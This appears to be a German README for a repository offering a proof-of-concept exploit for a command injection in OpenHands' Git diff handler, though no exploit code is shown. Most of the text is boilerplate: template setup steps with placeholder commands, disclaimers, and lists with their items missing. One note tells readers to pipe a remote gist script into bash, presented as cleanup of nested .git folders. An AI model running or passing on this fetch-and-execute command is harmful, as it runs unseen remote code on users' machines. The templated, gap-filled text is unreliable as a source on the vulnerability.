
Proof-of-Concept-Exploit für CVE-2026-33718, der eine Befehlsinjizierung im Git Diff Handler von OpenHands demonstriert. Lehrmaterial für Schwachstellenforschung und Laborübungen.
OpenHands ist anfällig für Befehlsinjektion über seinen Git-Diff-Handler
Unterstützen Sie die Wartung dieses Projekts mit PayPal oder durch Scannen des untenstehenden QR-Codes.
Verwenden Sie dieses Projekt nur in sicheren und autorisierten Umgebungen wie:
Beispiel-Setup:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Beispielverwendung:
# Install dependencies
<install-command>
# Run the project
<run-command>
# Replace the commands above with your actual project setup steps.
Hinweis:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um verschachtelte .git-Verzeichnisse zu bereinigen.Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.
Dieses Repository dient ausschließlich der Aus- und Weiterbildung sowie autorisierter Sicherheitsforschung.
Es wurde entwickelt, um Benutzern Folgendes näherzubringen:
Verwenden Sie dieses Repository nur in Umgebungen, für die Sie eine Genehmigung haben, wie z. B.:
Unautorisierte oder illegale Nutzung ist strengstens untersagt.
Der Autor und die Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.
Durch die Nutzung dieses Repositorys stimmen Sie zu, dass:
Dieses Projekt ist bestimmt für:
Bitte befolgen Sie verantwortungsvolle Offenlegungspraktiken (Responsible Disclosure) und halten Sie sich an alle geltenden Gesetze.
Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktieren Sie den Repository-Betreuer über GitHub.